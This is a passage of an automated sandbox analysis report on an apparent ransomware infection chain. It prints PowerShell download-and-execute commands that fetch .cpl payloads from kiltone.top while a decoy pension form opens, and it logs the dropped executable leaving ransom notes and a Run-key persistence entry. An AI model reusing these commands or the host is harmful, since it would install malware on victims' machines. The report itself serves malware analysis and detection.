Source: C:\Users\user\AppData\Local\Temp\eryy65ty.exeSection loaded: kernel.appcore.dll
Source: C:\Users\user\AppData\Local\Temp\eryy65ty.exeSection loaded: cryptbase.dll
Source: C:\Users\user\AppData\Local\Temp\eryy65ty.exeSection loaded: windows.storage.dll
Source: C:\Users\user\AppData\Local\Temp\eryy65ty.exeSection loaded: wldp.dll
Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: iphlpapi.dll
Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: framedynos.dll
Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: sspicli.dll
Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: kernel.appcore.dll
Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: wbemcomn.dll
Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: msxml6.dll
Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: urlmon.dll
Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: iertutil.dll
Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: srvcli.dll
Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: netutils.dll
Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: uxtheme.dll
Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: vcruntime140.dll
Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: vcruntime140_1.dll
Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: amsi.dll
Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: userenv.dll
Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: profapi.dll
Source: C:\Users\user\AppData\Local\Temp\eryy65ty.exeSection loaded: kernel.appcore.dll
Source: C:\Users\user\AppData\Local\Temp\eryy65ty.exeSection loaded: cryptbase.dll
Source: C:\Users\user\AppData\Local\Temp\eryy65ty.exeSection loaded: windows.storage.dll
Source: C:\Users\user\AppData\Local\Temp\eryy65ty.exeSection loaded: wldp.dll
Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: iphlpapi.dll
Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: framedynos.dll
Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: sspicli.dll
Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: kernel.appcore.dll
Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: wbemcomn.dll
Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: msxml6.dll
Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: urlmon.dll
Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: iertutil.dll
Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: srvcli.dll
Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: netutils.dll
Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: uxtheme.dll
Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: vcruntime140.dll
Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: vcruntime140_1.dll
Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: amsi.dll
Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: userenv.dll
Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: profapi.dll
Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: iphlpapi.dll
Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: framedynos.dll
Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: sspicli.dll
Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: kernel.appcore.dll
Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: wbemcomn.dll
Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: msxml6.dll
Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: urlmon.dll
Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: iertutil.dll
Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: srvcli.dll
Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: netutils.dll
Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: uxtheme.dll
Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: vcruntime140.dll
Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: vcruntime140_1.dll
Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: amsi.dll
Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: userenv.dll
Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: profapi.dll
Source: C:\Windows\SysWOW64\PING.EXESection loaded: iphlpapi.dll
Source: C:\Windows\SysWOW64\PING.EXESection loaded: winnsi.dll
Source: C:\Windows\SysWOW64\PING.EXESection loaded: mswsock.dll
Source: C:\Windows\System32\notepad.exeSection loaded: kernel.appcore.dll
Source: C:\Windows\System32\notepad.exeSection loaded: uxtheme.dll
Source: C:\Windows\System32\notepad.exeSection loaded: mrmcorer.dll
Source: C:\Windows\System32\notepad.exeSection loaded: windows.storage.dll
Source: C:\Windows\System32\notepad.exeSection loaded: wldp.dll
Source: C:\Windows\System32\notepad.exeSection loaded: textshaping.dll
Source: C:\Windows\System32\notepad.exeSection loaded: efswrt.dll
Source: C:\Windows\System32\notepad.exeSection loaded: mpr.dll
Source: C:\Windows\System32\notepad.exeSection loaded: wintypes.dll
Source: C:\Windows\System32\notepad.exeSection loaded: twinapi.appcore.dll
Source: C:\Windows\System32\notepad.exeSection loaded: oleacc.dll
Source: C:\Windows\System32\notepad.exeSection loaded: textinputframework.dll
Source: C:\Windows\System32\notepad.exeSection loaded: coreuicomponents.dll
Source: C:\Windows\System32\notepad.exeSection loaded: coremessaging.dll
Source: C:\Windows\System32\notepad.exeSection loaded: ntmarta.dll
Source: C:\Windows\System32\notepad.exeSection loaded: coremessaging.dll
Source: C:\Windows\System32\notepad.exeSection loaded: urlmon.dll
Source: C:\Windows\System32\notepad.exeSection loaded: iertutil.dll
Source: C:\Windows\System32\notepad.exeSection loaded: srvcli.dll
Source: C:\Windows\System32\notepad.exeSection loaded: netutils.dll
Source: C:\Windows\System32\notepad.exeSection loaded: propsys.dll
Source: C:\Windows\System32\notepad.exeSection loaded: policymanager.dll
Source: C:\Windows\System32\notepad.exeSection loaded: msvcp110_win.dll
Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: iphlpapi.dll
Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: framedynos.dll
Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: sspicli.dll
Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: kernel.appcore.dll
Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: wbemcomn.dll
Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: msxml6.dll
Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: urlmon.dll
Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: iertutil.dll
Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: srvcli.dll
Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: netutils.dll
Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: uxtheme.dll
Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: vcruntime140.dll
Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: vcruntime140_1.dll
Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: amsi.dll
Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: userenv.dll
Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: profapi.dll
Source: C:\Windows\SysWOW64\PING.EXESection loaded: iphlpapi.dll
Source: C:\Windows\SysWOW64\PING.EXESection loaded: winnsi.dll
Source: C:\Windows\SysWOW64\PING.EXESection loaded: mswsock.dll
Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: iphlpapi.dll
Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: framedynos.dll
Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: sspicli.dll
Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: kernel.appcore.dll
Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: wbemcomn.dll
Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: msxml6.dll
Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: urlmon.dll
Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: iertutil.dll
Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: srvcli.dll
Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: netutils.dll
Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: uxtheme.dll
Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: vcruntime140.dll
Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: vcruntime140_1.dll
Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: amsi.dll
Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: userenv.dll
Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: profapi.dll
Source: C:\Windows\SysWOW64\PING.EXESection loaded: iphlpapi.dll
Source: C:\Windows\SysWOW64\PING.EXESection loaded: winnsi.dll
Source: C:\Windows\SysWOW64\PING.EXESection loaded: mswsock.dll
Source: C:\Windows\System32\wscript.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{B54F3741-5B07-11cf-A4B0-00AA004A55E8}\InprocServer32Jump to behavior
Source: Google Drive.lnk.6.drLNK file: ..\..\..\..\..\..\..\..\..\Program Files\Google\Chrome\Application\chrome_proxy.exe
Source: YouTube.lnk.6.drLNK file: ..\..\..\..\..\..\..\..\..\Program Files\Google\Chrome\Application\chrome_proxy.exe
Source: Sheets.lnk.6.drLNK file: ..\..\..\..\..\..\..\..\..\Program Files\Google\Chrome\Application\chrome_proxy.exe
Source: Gmail.lnk.6.drLNK file: ..\..\..\..\..\..\..\..\..\Program Files\Google\Chrome\Application\chrome_proxy.exe
Source: Slides.lnk.6.drLNK file: ..\..\..\..\..\..\..\..\..\Program Files\Google\Chrome\Application\chrome_proxy.exe
Source: Docs.lnk.6.drLNK file: ..\..\..\..\..\..\..\..\..\Program Files\Google\Chrome\Application\chrome_proxy.exe
Source: C:\Users\user\AppData\Local\Temp\eryy65ty.exeFile written: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Maintenance\Desktop.ini
Source: Window RecorderWindow detected: More than 3 window changes detected
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dllJump to behavior
Source: Binary string: Z:\scvhost\Release\scvhost.pdb source: eryy65ty.exe, 00000021.00000000.2912147035.0000000000AEB000.00000002.00000001.01000000.00000008.sdmp, eryy65ty.exe, 00000029.00000000.3080470002.0000000000AEB000.00000002.00000001.01000000.00000008.sdmp, eryy65ty.exe, 0000002C.00000000.3165550384.0000000000AEB000.00000002.00000001.01000000.00000008.sdmp, eryy65ty.exe.30.dr
Source: Binary string: Z:\lderd\Release\lderd.pdb source: fjeljies.cpl.16.dr
Source: Binary string: Z:\scvhost\Release\scvhost.pdbd source: eryy65ty.exe, 00000021.00000000.2912147035.0000000000AEB000.00000002.00000001.01000000.00000008.sdmp, eryy65ty.exe, 00000029.00000000.3080470002.0000000000AEB000.00000002.00000001.01000000.00000008.sdmp, eryy65ty.exe, 0000002C.00000000.3165550384.0000000000AEB000.00000002.00000001.01000000.00000008.sdmp, eryy65ty.exe.30.dr

Data Obfuscation

barindex
Source: C:\Windows\System32\wscript.exeAnti Malware Scan Interface: .Run("cmd /c powershell start-process https://www.oldmutual.co.za/v3/assets/blt0", "0", "true");IWshShell3.Run("cmd /c powershell start-process https://www.oldmutual.co.za/v3/assets/blt0", "0", "true");IWshShell3.Run("cmd /c powershell -inputformat none -outputformat none -NonInteractive -Co", "0", "true");IWshShell3.Run("cmd /c powershell start-process https://www.oldmutual.co.za/v3/assets/blt0", "0", "true");IWshShell3.Run("cmd /c powershell -inputformat none -outputformat none -NonInteractive -Co", "0", "true");IWshShell3.Run("cmd /c powershell Invoke-WebRequest -Uri https://kiltone.top/stelin/rwcla.", "0", "true");IWshShell3.Run("cmd /c powershell start-process https://www.oldmutual.co.za/v3/assets/blt0", "0", "true");IWshShell3.Run("cmd /c powershell -inputformat none -outputformat none -NonInteractive -Co", "0", "true");IWshShell3.Run("cmd /c powershell Invoke-WebRequest -Uri https://kiltone.top/stelin/rwcla.", "0", "true");IWshShell3.Run("cmd /c control %temp%/fjeljies.cpl", "0", "true")
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell start-process https://www.oldmutual.co.za/v3/assets/blt0554f48052bb4620/blt8b52803ba23b252a/66742ed3b2cbc14f42b4434c/Superfund_Beneficiary_Nomination_form.pdf
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell Invoke-WebRequest -Uri https://kiltone.top/stelin/rwcla.cpl -Outfile $env:tmp\\fjeljies.cpl
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell Invoke-WebRequest -Uri https://kiltone.top/stelin/Gosjeufon.cpl -Outfile $env:tmp\eryy65ty.exe
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell start-process https://www.oldmutual.co.za/v3/assets/blt0554f48052bb4620/blt8b52803ba23b252a/66742ed3b2cbc14f42b4434c/Superfund_Beneficiary_Nomination_form.pdfJump to behavior
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell Invoke-WebRequest -Uri https://kiltone.top/stelin/rwcla.cpl -Outfile $env:tmp\\fjeljies.cplJump to behavior
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell Invoke-WebRequest -Uri https://kiltone.top/stelin/Gosjeufon.cpl -Outfile $env:tmp\eryy65ty.exe
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Local\Temp\eryy65ty.exeJump to dropped file
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Local\Temp\fjeljies.cplJump to dropped file
Source: C:\Program Files\Google\Chrome\Application\chrome.exeFile created: Chrome Cache Entry: 546
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Local\Temp\fjeljies.cplJump to dropped file
Source: C:\Program Files\Google\Chrome\Application\chrome.exeFile created: Chrome Cache Entry: 546Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\eryy65ty.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Decryptfiles.txt
Source: C:\Program Files\Google\Chrome\Application\chrome.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome AppsJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Google Drive.lnkJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\YouTube.lnkJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Sheets.lnkJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Gmail.lnkJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Slides.lnkJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Docs.lnkJump to behavior
Source: C:\Users\user\AppData\Local\Temp\eryy65ty.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Decryptfiles.txt
Source: C:\Users\user\AppData\Local\Temp\eryy65ty.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Decryptfiles.txt
Source: C:\Users\user\AppData\Local\Temp\eryy65ty.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Accessibility\Decryptfiles.txt
Source: C:\Users\user\AppData\Local\Temp\eryy65ty.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Accessories\Decryptfiles.txt
Source: C:\Users\user\AppData\Local\Temp\eryy65ty.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Administrative Tools\Decryptfiles.txt
Source: C:\Users\user\AppData\Local\Temp\eryy65ty.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Decryptfiles.txt
Source: C:\Users\user\AppData\Local\Temp\eryy65ty.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Maintenance\Decryptfiles.txt
Source: C:\Users\user\AppData\Local\Temp\eryy65ty.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Decryptfiles.txt
Source: C:\Users\user\AppData\Local\Temp\eryy65ty.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\Decryptfiles.txt
Source: C:\Users\user\AppData\Local\Temp\eryy65ty.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Windows PowerShell\Decryptfiles.txt
Source: C:\Users\user\AppData\Local\Temp\eryy65ty.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run XPSUDTARW
Source: C:\Users\user\AppData\Local\Temp\eryy65ty.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run XPSUDTARW

Hooking and other Techniques for Hiding and Protection

barindex
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
Source: C:\Users\user\AppData\Local\Temp\eryy65ty.exeKey value created or modified: HKEY_CURRENT_USER\SOFTWARE\SoftwareClient Private
Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
